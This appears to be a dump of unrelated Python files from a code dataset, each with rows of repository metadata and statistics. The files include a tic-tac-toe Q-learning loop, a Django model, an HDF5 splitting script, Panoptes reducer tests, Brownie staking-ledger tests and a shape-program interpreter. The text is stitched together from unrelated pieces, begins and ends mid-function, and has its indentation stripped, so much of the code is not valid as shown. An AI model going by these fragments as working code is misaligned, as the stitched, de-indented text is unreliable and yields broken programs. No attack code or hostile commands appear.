sprime=t[s][a]
s=sprime
turn+=1
return 2
#RandWin+=1
#print board
#print "Comp 2 Wins"
#------------------------------------------------------------------------------------------------
# SUPER COMPUTER VS RANDOM COMPUTER
# Supercomputer goes first
#------------------------------------------------------------------------------------------------
def TwoComputersRand2(Q, t, states):
s=0
turn =1
board=copy.deepcopy(states[s])
while game.gameOver(board, turn) is False:
#print board
indices=[]
for i in range(0,9):
if t[s][i]>-1:
indices.append(i)
pick = randrange(len(indices))
a = indices[pick]
board[a]=2
sprime=t[s][a]
s=sprime
turn+=1
if game.gameOver(board, turn) is True:
if game.threecheck(board) is True:
# print "Comp 2 WIN"
#Comp1Win+=1
return 2
else:
#print "ITS A DRAW"
#Draw+=1
return 0
#Computer will find the current state of the board
a = np.argmax(Q[s,:])
board[a]=1
sprime=t[s][a]
s=sprime
turn+=1
#print board
#Computer will find the current state of the board
#s=stateChecker(states, board)
return 1
#RandWin+=1
#print board
#print "Comp 2 Wins"
#------------------------------------------------------------------------------------------------
# SUPER COMPUTER VS SUPER COMPUTER
#
#------------------------------------------------------------------------------------------------
def TwoComputers(Q1,Q2, t, states):
s=0
turn =1
board=copy.deepcopy(states[s])
while game.gameOver(board, turn) is False:
#print board
#Computer will find the current state of the board
#s=stateChecker(states, board)
a = np.argmax(Q1[s,:])
board[a]=1
sprime=t[s][a]
s=sprime
turn+=1
#print board
if game.gameOver(board, turn) is True:
if game.threecheck(board) is True:
# print "Comp 1 WIN"
return 1
else:
#print "ITS A DRAW"
#Draw+=1
return 0
#Computer will find the current state of the board
#s=stateChecker(states, board)
a = np.argmax(Q2[s,:])
board[a]=2
sprime=t[s][a]
s=sprime
turn+=1
return 2
#RandWin+=1
#print board
#print "Comp 2 Wins"
| 28.021552 | 97 | 0.399938 | 646 | 6,501 | 4.020124 | 0.154799 | 0.057759 | 0.058914 | 0.072776 | 0.753562 | 0.727763 | 0.727763 | 0.703889 | 0.703889 | 0.6134 | 0 | 0.017706 | 0.400554 | 6,501 | 231 | 98 | 28.142857 | 0.648704 | 0.311183 | 0 | 0.844961 | 0 | 0 | 0.040525 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.131783 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d0903c826dedbd9f8f13f28029167e62f1eb04c0 | 202 | py | Python | 0430/Project/Blog/models.py | killua4564/jellyfish | 5d531a340f2088fcd586f3c3ebaf2854263ad22b | [
"BSD-2-Clause"
] | null | null | null | 0430/Project/Blog/models.py | killua4564/jellyfish | 5d531a340f2088fcd586f3c3ebaf2854263ad22b | [
"BSD-2-Clause"
] | 2 | 2018-03-05T02:45:47.000Z | 2018-03-05T03:42:21.000Z | 0430/Project/Blog/models.py | killua4564/jellyfish | 5d531a340f2088fcd586f3c3ebaf2854263ad22b | [
"BSD-2-Clause"
] | null | null | null | from django.db import models
class Post(models.Model):
title = models.CharField(max_length=200)
content = models.CharField(max_length=200)
def __str__(self):
return self.title
| 22.444444 | 46 | 0.69802 | 27 | 202 | 5 | 0.666667 | 0.222222 | 0.266667 | 0.355556 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0375 | 0.207921 | 202 | 8 | 47 | 25.25 | 0.80625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0.166667 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
190403c7d9eab806e39809e7c124764ad2156fd5 | 1,931 | py | Python | build/lib/whacc/examples/5_split_data_for_retrain_example.py | hireslab/whacc | e0ccfe4ee784609cacd4cf62a17192687a5dff51 | [
"MIT"
] | 1 | 2021-05-27T00:34:46.000Z | 2021-05-27T00:34:46.000Z | whacc/examples/5_split_data_for_retrain_example.py | hireslab/whacc | e0ccfe4ee784609cacd4cf62a17192687a5dff51 | [
"MIT"
] | null | null | null | whacc/examples/5_split_data_for_retrain_example.py | hireslab/whacc | e0ccfe4ee784609cacd4cf62a17192687a5dff51 | [
"MIT"
] | null | null | null | from whacc import utils
from whacc import image_tools
bd = '/Users/phil/Dropbox/Autocurator/data/samsons_subsets/use/train_and_validate/'
H5_list_to_train = utils.get_h5s(bd)
H5_list_to_train = utils.lister_it(H5_list_to_train,
keep_strings=['subset']) # get only the H5 files with the word 'subset'
print(H5_list_to_train)
split_h5_files = image_tools.split_h5(H5_list_to_train, [8, 3], temp_base_name=[bd + 'training_set', bd + 'validation_set'],
add_numbers_to_name=False)
#_________
bd = '/Users/phil/Dropbox/Autocurator/data/samsons_subsets/use/test/'
H5_list_to_train = utils.get_h5s(bd)
H5_list_to_train = utils.lister_it(H5_list_to_train,
keep_strings=['subset']) # get only the H5 files with the word 'subset'
print(H5_list_to_train)
split_h5_files = image_tools.split_h5(H5_list_to_train, [1], temp_base_name=[bd + 'test_set'],
add_numbers_to_name=False)
# import h5py
# import numpy as np
# H5_list_to_train = utils.get_h5s('/Users/phil/Dropbox/Autocurator/data/samsons_subsets/use/test/')
# for k in H5_list_to_train:
# with h5py.File(k, 'r') as h:
# print(k)
# print(len(np.unique(h['labels'][:])))
# # print(h.keys())
#
# #
# # H5_list_to_train = utils.get_h5s('/Users/phil/Dropbox/Autocurator/data/samsons_subsets/train_and_validate/')
# # H5_list_to_train = utils.lister_it(H5_list_to_train,
# # keep_strings=['subset']) # get only the H5 files with the word 'subset'
# # print(H5_list_to_train)
# # bd = '/Users/phil/Dropbox/Autocurator/data/samsons_subsets/train_and_validate/' # base directory to put files
# # split_h5_files = image_tools.split_h5(H5_list_to_train, [8, 3], temp_base_name=[bd + 'training', bd + 'validation'],
# # add_numbers_to_name=False)
| 52.189189 | 124 | 0.66753 | 286 | 1,931 | 4.115385 | 0.223776 | 0.086661 | 0.115548 | 0.187766 | 0.818182 | 0.80034 | 0.759558 | 0.759558 | 0.744265 | 0.649958 | 0 | 0.024326 | 0.212325 | 1,931 | 36 | 125 | 53.638889 | 0.749507 | 0.501813 | 0 | 0.625 | 0 | 0 | 0.197849 | 0.148387 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
efa37700b7f3c83cf72f4c55aecb0771a81e86cc | 105 | py | Python | lang/Python/string-length-2.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
] | null | null | null | lang/Python/string-length-2.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
] | null | null | null | lang/Python/string-length-2.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
] | null | null | null | # The letter Alef
print(len('\u05d0'.encode('utf-8')))
# 2
print(len('\u05d0'.encode('iso-8859-8')))
# 1
| 17.5 | 41 | 0.619048 | 18 | 105 | 3.611111 | 0.722222 | 0.246154 | 0.4 | 0.584615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147368 | 0.095238 | 105 | 5 | 42 | 21 | 0.536842 | 0.180952 | 0 | 0 | 0 | 0 | 0.329268 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
325cd1bd939e1d286e975d9a0fa0efcadf587a13 | 652 | py | Python | src/bases.py | helish88/AnimateaBot | 2ff03b62a31ef19ce4436858ed38c090682e3629 | [
"Apache-2.0"
] | null | null | null | src/bases.py | helish88/AnimateaBot | 2ff03b62a31ef19ce4436858ed38c090682e3629 | [
"Apache-2.0"
] | null | null | null | src/bases.py | helish88/AnimateaBot | 2ff03b62a31ef19ce4436858ed38c090682e3629 | [
"Apache-2.0"
] | null | null | null | import typing
from src import errors
__all__: tuple[str, ...] = ("Immutable",)
class Immutable:
def __setitem__(self, _: typing.Any, __: typing.Any) -> typing.NoReturn:
raise errors.ObjectIsImmutableError("Enums are immutable.")
def __setattr__(self, _: typing.Any, __: typing.Any) -> typing.NoReturn:
raise errors.ObjectIsImmutableError("Enums are immutable.")
def __delattr__(self, _: typing.Any) -> typing.NoReturn:
raise errors.ObjectIsImmutableError("Enums are immutable.")
def __delitem__(self, _: typing.Any) -> typing.NoReturn:
raise errors.ObjectIsImmutableError("Enums are immutable.")
| 31.047619 | 76 | 0.703988 | 68 | 652 | 6.338235 | 0.323529 | 0.12529 | 0.208817 | 0.176334 | 0.777262 | 0.777262 | 0.777262 | 0.777262 | 0.777262 | 0.777262 | 0 | 0 | 0.173313 | 652 | 20 | 77 | 32.6 | 0.799629 | 0 | 0 | 0.333333 | 0 | 0 | 0.136503 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.166667 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
32b089cbb3064d8d886cdd36276047a2861d3f60 | 62 | py | Python | src/test/processing_ut.py | KewJS/Customer_Segmentation | b045d5abc88fc25975067fcac4f4c2a4e538ad07 | [
"MIT"
] | null | null | null | src/test/processing_ut.py | KewJS/Customer_Segmentation | b045d5abc88fc25975067fcac4f4c2a4e538ad07 | [
"MIT"
] | 1 | 2020-09-08T16:19:02.000Z | 2020-09-08T16:19:02.000Z | src/test/processing_ut.py | KewJS/Customer_Segmentation | b045d5abc88fc25975067fcac4f4c2a4e538ad07 | [
"MIT"
] | null | null | null | from unittest.mock import Mock
from unittest.mock import patch | 31 | 31 | 0.854839 | 10 | 62 | 5.3 | 0.5 | 0.45283 | 0.603774 | 0.830189 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112903 | 62 | 2 | 31 | 31 | 0.963636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
087927080aa04a69422b4986c6de20553155795c | 7,092 | py | Python | panoptes_aggregation/tests/reducer_tests/test_subtask_reducer_v2.py | ramanakumars/aggregation-for-caesar | 1ff803ed0d25539f095f87fc72fdeafce742c4e2 | [
"Apache-2.0"
] | null | null | null | panoptes_aggregation/tests/reducer_tests/test_subtask_reducer_v2.py | ramanakumars/aggregation-for-caesar | 1ff803ed0d25539f095f87fc72fdeafce742c4e2 | [
"Apache-2.0"
] | null | null | null | panoptes_aggregation/tests/reducer_tests/test_subtask_reducer_v2.py | ramanakumars/aggregation-for-caesar | 1ff803ed0d25539f095f87fc72fdeafce742c4e2 | [
"Apache-2.0"
] | null | null | null | from panoptes_aggregation import reducers
from .base_test_class import ReducerTestNoProcessing
extracted_data = [
{
'classifier_version': '2.0',
'frame0': {
'T0_toolIndex0_x': [0.0, 100.0],
'T0_toolIndex0_y': [0.0, 100.0],
'T0_toolIndex0_subtask0': [
{'0': 1},
{'1': 1}
],
'T0_toolIndex0_subtask1': [
{'value': [
{'option-1': 1},
{'option-2': 1},
{'None': 1}
]},
{'value': [
{'option-3': 1},
{'option-4': 1},
{'option-5': 1}
]}
],
'T0_toolIndex1_x': [500.0],
'T0_toolIndex1_y': [500.0],
'T0_toolIndex1_subtask0': [
{'1': 1}
],
'T0_toolIndex1_subtask1': [
{'value': [
{'option-3': 1},
{'option-4': 1},
{'option-5': 1}
]}
]
}
},
{
'classifier_version': '2.0',
'frame0': {
'T0_toolIndex0_x': [0.0, 100.0],
'T0_toolIndex0_y': [0.0, 100.0],
'T0_toolIndex0_subtask0': [
{'1': 1},
{'1': 1}
],
'T0_toolIndex0_subtask1': [
{'value': [
{'option-1': 1},
{'option-2': 1},
{'option-3': 1}
]},
{'value': [
{'option-1': 1},
{'option-4': 1},
{'option-5': 1}
]}
],
'T0_toolIndex1_x': [500.0],
'T0_toolIndex1_y': [500.0],
'T0_toolIndex1_subtask0': [
{'1': 1}
],
'T0_toolIndex1_subtask1': [
{'value': [
{'option-1': 1},
{'option-3': 1},
{'option-5': 1}
]}
]
}
},
{
'classifier_version': '2.0',
'frame0': {
'T0_toolIndex1_x': [500.0],
'T0_toolIndex1_y': [500.0],
'T0_toolIndex1_subtask0': [
{'0': 1}
],
'T0_toolIndex1_subtask1': [
{'value': [
{'option-1': 1},
{'option-3': 1},
{'option-5': 1}
]}
]
}
}
]
kwargs_extra_data = {
'user_id': [
1,
2,
3
]
}
reduced_data = {
'classifier_version': '2.0',
'frame0': {
'T0_toolIndex0_point_x': [0.0, 100.0, 0.0, 100.0],
'T0_toolIndex0_point_y': [0.0, 100.0, 0.0, 100.0],
'T0_toolIndex0_cluster_labels': [0, 1, 0, 1],
'T0_toolIndex0_clusters_count': [2, 2],
'T0_toolIndex0_clusters_x': [0.0, 100.0],
'T0_toolIndex0_clusters_y': [0.0, 100.0],
'T0_toolIndex0_subtask0': [
{'0': 1},
{'1': 1},
{'1': 1},
{'1': 1}
],
'T0_toolIndex0_subtask1': [
{'value': [
{'option-1': 1},
{'option-2': 1},
{'None': 1}
]},
{'value': [
{'option-3': 1},
{'option-4': 1},
{'option-5': 1}
]},
{'value': [
{'option-1': 1},
{'option-2': 1},
{'option-3': 1}
]},
{'value': [
{'option-1': 1},
{'option-4': 1},
{'option-5': 1}
]}
],
'T0_toolIndex0_subtask0_clusters': [
{'0': 1, '1': 1},
{'1': 2}
],
'T0_toolIndex0_subtask1_clusters': [
{'value': [
{'option-1': 2},
{'option-2': 2},
{'None': 1, 'option-3': 1}
]},
{'value': [
{'option-3': 1, 'option-1': 1},
{'option-4': 2},
{'option-5': 2}
]}
],
'T0_toolIndex1_point_x': [500.0, 500.0, 500.0],
'T0_toolIndex1_point_y': [500.0, 500.0, 500.0],
'T0_toolIndex1_cluster_labels': [0, 0, 0],
'T0_toolIndex1_clusters_count': [3],
'T0_toolIndex1_clusters_x': [500.0],
'T0_toolIndex1_clusters_y': [500.0],
'T0_toolIndex1_subtask0': [
{'1': 1},
{'1': 1},
{'0': 1}
],
'T0_toolIndex1_subtask1': [
{'value': [
{'option-3': 1},
{'option-4': 1},
{'option-5': 1}
]},
{'value': [
{'option-1': 1},
{'option-3': 1},
{'option-5': 1}
]},
{'value': [
{'option-1': 1},
{'option-3': 1},
{'option-5': 1}
]}
],
'T0_toolIndex1_subtask0_clusters': [
{'0': 1, '1': 2}
],
'T0_toolIndex1_subtask1_clusters': [
{'value': [
{'option-1': 2, 'option-3': 1},
{'option-3': 2, 'option-4': 1},
{'option-5': 3}
]}
]
}
}
TestSubtaskReducerV2 = ReducerTestNoProcessing(
reducers.shape_reducer_dbscan,
extracted_data,
reduced_data,
'Test subtask reducer with classifier v2 extracts',
network_kwargs=kwargs_extra_data,
kwargs={
'shape': 'point',
'eps': 5,
'min_samples': 2,
'details': {
'T0_toolIndex0_subtask0': 'question_reducer',
'T0_toolIndex0_subtask1': 'dropdown_reducer',
'T0_toolIndex1_subtask0': 'question_reducer',
'T0_toolIndex1_subtask1': 'dropdown_reducer'
}
},
test_name='TestSubtaskReducerV2'
)
reduced_data_no_details = {
'frame0': {
'T0_toolIndex0_point_x': [0.0, 100.0, 0.0, 100.0],
'T0_toolIndex0_point_y': [0.0, 100.0, 0.0, 100.0],
'T0_toolIndex0_cluster_labels': [0, 1, 0, 1],
'T0_toolIndex0_clusters_count': [2, 2],
'T0_toolIndex0_clusters_x': [0.0, 100.0],
'T0_toolIndex0_clusters_y': [0.0, 100.0],
'T0_toolIndex1_point_x': [500.0, 500.0, 500.0],
'T0_toolIndex1_point_y': [500.0, 500.0, 500.0],
'T0_toolIndex1_cluster_labels': [0, 0, 0],
'T0_toolIndex1_clusters_count': [3],
'T0_toolIndex1_clusters_x': [500.0],
'T0_toolIndex1_clusters_y': [500.0],
}
}
TestSubtaskReducerV2NoDetails = ReducerTestNoProcessing(
reducers.shape_reducer_dbscan,
extracted_data,
reduced_data_no_details,
'Test subtask reducer with classifier v2 extracts',
network_kwargs=kwargs_extra_data,
kwargs={
'shape': 'point',
'eps': 5,
'min_samples': 2
},
test_name='TestSubtaskReducerV2NoDetails'
)
| 28.829268 | 58 | 0.401297 | 666 | 7,092 | 4.004505 | 0.09009 | 0.023247 | 0.029996 | 0.035996 | 0.821897 | 0.79715 | 0.782152 | 0.755156 | 0.736783 | 0.68204 | 0 | 0.127028 | 0.434997 | 7,092 | 245 | 59 | 28.946939 | 0.538558 | 0 | 0 | 0.732218 | 0 | 0 | 0.30612 | 0.159757 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.008368 | 0 | 0.008368 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
08b450f84eb5bdc034242b7ff2d4e32a3e44aa4e | 6,614 | py | Python | tests/transfer_free_test.py | mixbytes/lido-dot-ksm | d9cfa4bd113a14d18cf2e4c8cf2c9a08dde8e5ff | [
"MIT"
] | null | null | null | tests/transfer_free_test.py | mixbytes/lido-dot-ksm | d9cfa4bd113a14d18cf2e4c8cf2c9a08dde8e5ff | [
"MIT"
] | 5 | 2022-03-21T15:23:26.000Z | 2022-03-28T07:59:27.000Z | tests/transfer_free_test.py | mixbytes/lido-dot-ksm | d9cfa4bd113a14d18cf2e4c8cf2c9a08dde8e5ff | [
"MIT"
] | null | null | null | from brownie import chain
from helpers import RelayChain, distribute_initial_tokens
import pytest
def test_deposit_distribution_1(lido, oracle_master, vKSM, Ledger, withdrawal, accounts):
distribute_initial_tokens(vKSM, lido, accounts)
lido_balance = 100 * 10**12
vKSM.transfer(lido, lido_balance, {'from': accounts[0]})
relay = RelayChain(lido, vKSM, oracle_master, accounts, chain)
stashes = [0x10, 0x20, 0x30, 0x40]
for i in range(len(stashes)):
stash = stashes[i]
relay.new_ledger(hex(stash), hex(stash + 1))
relay.new_era()
# working system for 4 ledgers
deposit = 20000 * 10**12
lido.deposit(deposit, {'from': accounts[0]})
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance
relay.new_era()
assert relay.ledgers[0].free_balance == 0
assert relay.ledgers[0].active_balance == deposit // 4
# adding new ledger
stash = 0x50
relay.new_ledger(hex(stash), hex(stash + 1))
relay.new_era()
# redeem
redeem = 4000 * 10**12
lido.redeem(redeem, {'from': accounts[0]})
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance
assert relay.ledgers[0].free_balance == 0
assert relay.ledgers[0].active_balance == (deposit - redeem) // 4
# another deposit
deposit_2 = 10000 * 10**12
lido.deposit(deposit_2, {'from': accounts[0]})
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance
assert relay.ledgers[4].free_balance == (deposit + deposit_2 - redeem) // 5
ledger_free = (deposit + deposit_2 - redeem) // 5 - deposit // 4
assert relay.ledgers[0].free_balance == ledger_free
assert relay.ledgers[0].active_balance == deposit // 4
# redeem
redeem_2 = 5000 * 10**12
lido.redeem(redeem_2, {'from': accounts[0]})
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance
ledger = Ledger.at(relay.ledgers[0].ledger_address)
assert ledger.transferDownwardBalance() == ledger_free
# deposit
deposit_3 = 5000 * 10**12
lido.deposit(deposit_3, {'from': accounts[0]})
for i in range(5):
print(str(Ledger.at(relay.ledgers[i].ledger_address).transferDownwardBalance()))
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance
def test_deposit_distribution_2(lido, oracle_master, vKSM, Ledger, withdrawal, accounts):
distribute_initial_tokens(vKSM, lido, accounts)
lido_balance = 100 * 10**12
vKSM.transfer(lido, lido_balance, {'from': accounts[0]})
relay = RelayChain(lido, vKSM, oracle_master, accounts, chain)
stashes = [0x10, 0x20, 0x30, 0x40]
for i in range(len(stashes)):
stash = stashes[i]
relay.new_ledger(hex(stash), hex(stash + 1))
relay.new_era()
# working system for 4 ledgers
deposit = 20000 * 10**12
lido.deposit(deposit, {'from': accounts[0]})
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance
relay.new_era()
assert relay.ledgers[0].free_balance == 0
assert relay.ledgers[0].active_balance == deposit // 4
# adding new ledger
stash = 0x50
relay.new_ledger(hex(stash), hex(stash + 1))
relay.new_era()
# redeem
redeem = 4000 * 10**12
lido.redeem(redeem, {'from': accounts[0]})
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance
assert relay.ledgers[0].free_balance == 0
assert relay.ledgers[0].active_balance == (deposit - redeem) // 4
# another deposit
deposit_2 = 10000 * 10**12
lido.deposit(deposit_2, {'from': accounts[0]})
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance
assert relay.ledgers[4].free_balance == (deposit + deposit_2 - redeem) // 5
ledger_free = (deposit + deposit_2 - redeem) // 5 - deposit // 4
assert relay.ledgers[0].free_balance == ledger_free
assert relay.ledgers[0].active_balance == deposit // 4
# redeem
redeem_2 = 5000 * 10**12
lido.redeem(redeem_2, {'from': accounts[0]})
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance
ledger = Ledger.at(relay.ledgers[0].ledger_address)
assert ledger.transferDownwardBalance() == ledger_free
# deposit
deposit_3 = 10 * 10**12
lido.deposit(deposit_3, {'from': accounts[0]})
for i in range(5):
print(str(Ledger.at(relay.ledgers[i].ledger_address).transferDownwardBalance()))
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance
def test_deposit_distribution_3(lido, oracle_master, vKSM, Ledger, withdrawal, accounts):
distribute_initial_tokens(vKSM, lido, accounts)
lido_balance = 100 * 10**12
vKSM.transfer(lido, lido_balance, {'from': accounts[0]})
relay = RelayChain(lido, vKSM, oracle_master, accounts, chain)
stashes = [0x10, 0x20, 0x30, 0x40]
for i in range(len(stashes)):
stash = stashes[i]
relay.new_ledger(hex(stash), hex(stash + 1))
relay.new_era()
# working system for 4 ledgers
deposit = 20000 * 10**12
lido.deposit(deposit, {'from': accounts[0]})
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance
relay.new_era()
assert relay.ledgers[0].free_balance == 0
assert relay.ledgers[0].active_balance == deposit // 4
# adding new ledger
stash = 0x50
relay.new_ledger(hex(stash), hex(stash + 1))
relay.new_era()
# redeem
redeem = 4000 * 10**12
lido.redeem(redeem, {'from': accounts[0]})
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance
assert relay.ledgers[0].free_balance == 0
assert relay.ledgers[0].active_balance == (deposit - redeem) // 4
# another deposit
deposit_2 = 10000 * 10**12
lido.deposit(deposit_2, {'from': accounts[0]})
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance
assert relay.ledgers[4].free_balance == (deposit + deposit_2 - redeem) // 5
ledger_free = (deposit + deposit_2 - redeem) // 5 - deposit // 4
assert relay.ledgers[0].free_balance == ledger_free
assert relay.ledgers[0].active_balance == deposit // 4
# redeem
redeem_2 = 5000 * 10**12
lido.redeem(redeem_2, {'from': accounts[0]})
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance
ledger = Ledger.at(relay.ledgers[0].ledger_address)
assert ledger.transferDownwardBalance() == ledger_free
# deposit
deposit_3 = 4500 * 10**12
lido.deposit(deposit_3, {'from': accounts[0]})
for i in range(5):
print(str(Ledger.at(relay.ledgers[i].ledger_address).transferDownwardBalance()))
relay.new_era()
assert vKSM.balanceOf(lido) == lido_balance | 29.395556 | 89 | 0.662232 | 880 | 6,614 | 4.825 | 0.077273 | 0.056524 | 0.062176 | 0.072068 | 0.971032 | 0.971032 | 0.971032 | 0.971032 | 0.971032 | 0.971032 | 0 | 0.05602 | 0.20381 | 6,614 | 225 | 90 | 29.395556 | 0.750285 | 0.038403 | 0 | 0.93617 | 0 | 0 | 0.011353 | 0 | 0 | 0 | 0.009461 | 0 | 0.276596 | 1 | 0.021277 | false | 0 | 0.021277 | 0 | 0.042553 | 0.021277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
eb16a53594cf2b3c1b724251b7b01a80b10df414 | 18,823 | py | Python | interpreter.py | aluo-x/shape2prog | 1177e5205b99bb293e353688b564c94a14211c75 | [
"BSD-2-Clause"
] | 109 | 2019-01-10T03:16:21.000Z | 2022-02-10T07:39:22.000Z | interpreter.py | aluo-x/shape2prog | 1177e5205b99bb293e353688b564c94a14211c75 | [
"BSD-2-Clause"
] | 6 | 2019-06-11T13:30:08.000Z | 2020-11-19T17:42:12.000Z | interpreter.py | aluo-x/shape2prog | 1177e5205b99bb293e353688b564c94a14211c75 | [
"BSD-2-Clause"
] | 16 | 2019-01-16T08:08:18.000Z | 2021-11-11T02:52:40.000Z | from __future__ import print_function
import numpy as np
class Interpreter(object):
"""interpreting program vectors into understandable program strings"""
def __init__(self, translate, rotate, end):
self.translate = translate
self.rotate = rotate
self.end = end
def interpret(self, pgm, param):
n_block = pgm.shape[0]
param = np.round(param).astype(np.int32)
result = ""
for i in range(n_block):
res = self.interpret_block(pgm[i], param[i])
if res is None:
continue
else:
result += res
result += "\n"
return result
def interpret_block(self, pgm, param):
"""
interpret each block
"""
flag = 1
block_res = []
if pgm[0] == self.translate:
if pgm[1] == self.translate:
if 1 <= pgm[2] < self.translate:
sentence = "for(i<{}, 'Trans', u1=({},{},{}))"\
.format(param[0, 0], param[0, 1], param[0, 2], param[0, 3])
block_res.append(sentence)
sentence = "for(i<{}, 'Trans', u2=({},{},{}))"\
.format(param[1, 0], param[1, 1], param[1, 2], param[1, 3])
block_res.append(" "+sentence)
sentence = self.interpret_sentence(pgm[2], param[2], num_trans=2, num_rot=0)
block_res.append(" "+sentence)
else:
pass
elif 1 <= pgm[1] < self.translate:
sentence = "for(i<{}, 'Trans', u=({},{},{}))" \
.format(param[0, 0], param[0, 1], param[0, 2], param[0, 3])
block_res.append(sentence)
sentence = self.interpret_sentence(pgm[1], param[1], num_trans=1, num_rot=0)
block_res.append(" " + sentence)
else:
pass
elif pgm[0] == self.rotate:
if pgm[1] == 10 or pgm[1] == 17:
sentence = "for(i<{}, 'Rot', theta={}\N{DEGREE SIGN}, axis=({},{},{})"\
.format(param[0, 0], int(360/param[0,0]),
param[1, 0], param[1, 1], param[1, 2])
block_res.append(sentence)
sentence = self.interpret_sentence(pgm[1], param[1], num_trans=0, num_rot=1)
block_res.append(" " + sentence)
else:
pass
elif 1 <= pgm[0] < self.translate:
sentence = self.interpret_sentence(pgm[0], param[0], num_trans=0, num_rot=0)
block_res.append(sentence)
else:
pass
if len(block_res) == 0:
return None
else:
res = ''
for i in range(len(block_res)):
res += block_res[i] + '\n'
return res
def interpret_sentence(self, pgm, param, num_trans=0, num_rot=0):
"""
interpret each sentence
"""
if num_trans == 0 and num_rot == 0:
if pgm == 1:
sentence = "draw('Leg', 'Cub', P=({},{},{}), G=({},{},{}))"\
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 2:
sentence = "draw('Top', 'Rec', P=({},{},{}), G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 3:
sentence = "draw('Top', 'Square', P=({},{},{}), G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 4:
sentence = "draw('Top', 'Circle', P=({},{},{}), G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 5:
sentence = "draw('Layer', 'Rec', P=({},{},{}), G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 6:
sentence = "draw('Sup', 'Cylinder', P=({},{},{}), G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 7:
sentence = "draw('Sup', 'Cub', P=({},{},{}), G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 8:
